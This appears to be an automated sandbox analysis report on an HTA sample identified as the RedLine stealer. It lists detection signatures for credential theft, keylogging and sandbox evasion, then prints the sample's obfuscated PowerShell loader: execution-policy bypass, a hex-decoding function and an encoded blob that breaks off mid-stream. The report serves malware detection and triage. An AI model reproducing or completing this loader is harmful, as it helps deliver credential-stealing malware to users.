Edit tour
Windows
Analysis Report
payload_1.hta
Overview
General Information
Detection
RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7452 cmdline:
mshta.exe "C:\Users\ user\Deskt op\payload _1.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7608 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction CgMQ B($seVe){r eturn -spl it ($seVe -replace ' ..', '0x$& ')};$QBRr = CgMQB(' 619C354D6D B9F3F484D1 1E37F9A5C9 8CA2C67AD4 4869DAD2A1 B050859A2F 64301D2176 E5E02553EC 057B7DEFE9 77761F13EC 3B821FD2BF 7B61A2835F 048AADB9D5 3EA5090C8A 4909936162 D4E888EDAE 5C2805A7B7 078C416E9E BA91A77378 60E61CDA68 0064BEAC6C 3B43D4A742 CBC7650066 B7009F6EED 14E649BFE5 141BC68203 31279B1D91 D1AFB9A002 D60B1142E4 BA80436C1A CBDF43F77D 145A1AE776 B79BBDC6B4 9934E8485C E19389F13E D554B250D9 069CAAA26C 8F20AFA47B 2981F49526 5E62E71898 8B04FBEC2F AF9362FCCF C8295B4FF3 6FDF66DC47 036B18CF40 2A773F7EB3 0CF918CC35 23247BC946 DD3C511642 8886F84651 8591A5473C 4029C6021C 9D2E4DC7EC 2B2F826CB9 9917AE10C1 E8E375C6DD 683272B3A9 57825DDC8C C3E570E90E AF546E0970 7A8515195E E8896646E1 AC066E5BD2 875F823930 34B362AB91 C9724851B2 05B4A02975 E1B9215263 87AB1CCF84 96B8225171 653B45D000 624D31EBB8 A75E93A4FA EA1DA654CB BD9F01209D 48530BDF02 22A13A588A 75E568B180 65FA2534B0 792938B384 75ABE2BBFA 3D79293144 E35126501B 0636B6C131 B9A7E78357 B3CAFD6D6F FBFB82F95F 053407BD8B 91DD016719 170A36D885 38050AE80A 028D7C6587 1924A58828 5AB0798B12 4073A5337B 6C7C9F6D79 1F852F957A 88C51CDD52 86C788EE80 0F41905A22 D4F3C546EE D053C37CA8 1FAC085A06 04145517E3 87F8920963 7F36CBDFE3 EFA22D81D0 23E26B486F 415A9F6051 3E1F044BA9 38BA37A749 A7D64E606F 389CEA95ED E63FE4D4D0 B5318E9494 6B345978B8 06EB97BAA7 317F0D6644 1555CD8B04 98CBCE4563 F274174155 32A59009F1 2D93486BAA 576D66E1A9 4C2FCF0AFF 4D97FF6AC0 DED5AE9DD1 C28BC9FB4B 7B32EBAE00 E90301C7B1 0FB2569818 21BA7D05E5 9142ED2B63 DAF46E3F14 731A7EE68F DA15C0ECB8 5076D5D3C1 627FFECC12 A8AB2AFA5D CFB028E118 D7C7E65F6B DDCC94632D 5131D101D2 D1AD09C79D F3500ABC5C A72110F7FB 629E9784A3 40DA2F69C7 EF41790C7E CF578195A0 226541AA00 5B9576C5DB 3EC2D21E43 AD093C6007 DB20F96D75 2DDD4CB39B B4B44576D7 DF95F0DD75 240B1B45D1 2AD14DD1C6 2D252B89E4 C3F6D7EA6D B64ACD483A 82DB456666 DDB4E66A70 4027AAC524 3D0FEF1723 B6BFBA2507 B09B620E2E 05AEBA95C5 C15912F976 2FE744C407 625420E36C 579137B8DA 48E8B2B3D9 CEB9EA7D17 AF11408522 99ADE0A8B4 4C9F5B8418 5E999DB924 CA89E2381F 4C206A8C9A A660F47B14 8421EB0BA7 EBF85A7241 C5492982E4 137425C91B A9C5DFB91E 9CE1808CD8 F1A495DB03 460FA132E8 0E1B3E0BE5 A128F98183 612928708B D201626624 B297A12880 537A327369 FD4E4910DA 3FD868CD9E BE5BD79C84 42CE12C6C5 8D0B69BA72 E4ED3EAF25 028C786F30 71CDD15675 E2CDE51367 36E09A963F 3819A8E5CD 1D162CFF51 D8A4C10143 B9819A2FB9 7A69508DAF C432392454 4B31FF36BB AFC96F545A BECE3235E2 FFA3205157 DD1EBAE29C D05BAB7A53 396ACB35F7 F234057291 F2FD7A472A 2618EDC099 5E36672AC7 25DE56E49A F3EDF3D49D ABEB7C2E83 CD39E4A1E4 FD35C3AE52 263B5EA0B9